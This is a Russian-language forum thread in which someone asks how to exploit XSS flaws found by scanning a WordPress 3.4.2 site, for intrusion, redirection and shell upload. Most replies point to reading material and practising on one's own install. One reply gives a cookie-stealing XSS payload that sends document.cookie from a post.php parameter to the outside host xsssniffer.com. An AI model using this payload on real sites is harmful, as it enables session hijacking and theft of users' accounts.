![]() |
Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )
|
Цитата:
|
Цитата:
|
Цитата:
ПС К прочтению рекомендую - XSS атака, а так же поставить себе и поиздеваться на WP =) двиг очень популярный, но основыне ошибки идут в довесках к нему, иногда даже тема может быть уязвима. |
Цитата:
|
Цитата:
Можно подлкючить сниффер куки ---> site.com/post.php?p='>img=new Image();img.src="http://xsssniffer.com/sniff.gif?"+document.cookie;"+document.cookie; Почитать - тема очень обширная. Первым делом, следует проверить, а есть ли на ренсурсе та самая XSS (на себе в браузере). В вики есть статья После прочтения уже будет более ясно, каким образом это использовать. |
| Время: 13:59 |